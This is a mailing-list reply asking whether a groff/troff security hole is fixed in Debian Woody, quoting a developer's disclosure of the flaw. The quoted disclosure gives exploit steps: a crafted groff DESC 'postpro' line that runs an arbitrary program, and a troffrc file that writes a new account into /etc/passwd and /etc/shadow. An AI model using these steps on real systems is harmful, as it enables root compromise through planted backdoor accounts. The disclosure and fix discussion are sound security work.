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Re: Groff/troff security exposure

Just a question. I've tried it on my own server which is Debian 2.2.17 woody(unstable) version. I got the following message when trying 2:

./troffrc:1: can't open `/etc/passwd' for appending: Permission denied
./troffrc:2: no stream named 'passwds'
./troffrc:3: no stream named 'passwds'

Is this bug already fixed in Debian 2.2 Woody(unstable)?


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> 	I have just read a security announcement sent by ISSalert regarding groff
> manipulation that can lead to a security compromise (available at 
> http://xforce.iss.net/alerts/advise63.php). 
> 	The problem is that both troff and groff read files in the working directory
> which can spin off commands in behalf of the user. This can be very sensible if
> the one running a 'man' command is root since the whole system is exposed.
> 	For in depth information refer to the link above, I have tested an exploit in
> Debian GNU/Linux 2.2 and works as expected.
> 1.- groff attack
> Reason:	Groff will read any "devXX" directory available at the local dir and
> process 'postpro' commands execv'ing them. 
> Test: Put a 'devlatin1' copy of /usr/share/groff/font/devlatin1/ files in the
> /tmp dir, edit the DESC file to include (at the end):
> postpro ../../../tmp/exploit
> 	Now put your favourite exploit in /tmp/exploit (for example add a new user to
> /etc/passwd and /etc/shadow)
> 	Then run 'groff -Tlatin1 ls.1' in /tmp as root. See what happens
> 2.- troff attack
> Reason: troff will read any 'troffrc' file in the current dir
> Test: put a troffrc file in the /tmp dir, check the troff manpage to see what it
> can do. For example:
> .opena passwds /etc/passwd
> .write passwds guest:x:10000:10000::/:/bin/sh
> .close passwds
> .opena passwds /etc/shadow
> .write passwds guest:AqualifiedHashPsswd:11215:0:99999:7:::
> .close passwds
> 	And run 'troff *anyfile*'
> 	Check /etc/passwd :)
> 	Now, this will not exactly work when doing 'man' since it will 
> 1.- set its directory to where $MANPATH  or where /etc/manpath.config points to
> 2.- change euid to 'man'.
> 	However, man is not the only system that uses groff. I've checked package
> dependencies and, for example: gnosamba (configuration utility for Samba that
> will surely run as root since it has to change /etc/samba) and a2ps *do* use
> groff.
> 	I have not checked their sources on how could this be exploited, but if they
> have not be carefully coded to check this situation (like man is).
> 	My suggestion: groff and troff should *not* extend their paths to current
> directory, *or* should not allow processing files from different users if owner
> is root (to avoid a root compromise).
> 	Regards
> 	Javier Fernández-Sanguino Peña
> 	Debian GNU/Linux developer
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